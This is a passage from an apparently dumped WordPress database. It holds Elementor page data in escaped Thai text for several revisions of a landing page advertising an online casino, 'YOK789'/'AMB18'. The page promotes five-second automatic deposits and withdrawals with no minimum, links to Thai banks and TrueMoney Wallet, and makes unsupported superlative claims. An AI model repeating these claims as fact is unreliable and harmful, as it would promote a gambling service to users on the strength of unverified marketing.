\\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-Yok789.webp\",\"id\":293,\"size\":\"\",\"alt\":\"3icon\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c YOK789 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>YOK789<\\/b> \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 <b>YOK789<\\/b> <\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 <b>YOK789<\\/b> \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2968,397,'_thumbnail_id','345'),(2972,398,'_elementor_edit_mode','builder'),(2973,398,'_elementor_template_type','wp-page'),(2974,398,'_elementor_version','3.35.5'),(2975,398,'_elementor_pro_version','3.32.3'),(2976,398,'_wp_page_template','default'),(2977,398,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2978,398,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>YOK789<\\/b> \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-Yok789.webp\",\"id\":293,\"size\":\"\",\"alt\":\"3icon\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c YOK789 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>YOK789<\\/b> \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 <b>YOK789<\\/b> <\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 <b>YOK789<\\/b> \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2979,398,'_thumbnail_id','345'),(2983,399,'_elementor_edit_mode','builder'),(2984,399,'_elementor_template_type','wp-page'),(2985,399,'_elementor_version','3.35.5'),(2986,399,'_elementor_pro_version','3.32.3'),(2987,399,'_wp_page_template','default'),(2988,399,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2989,399,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 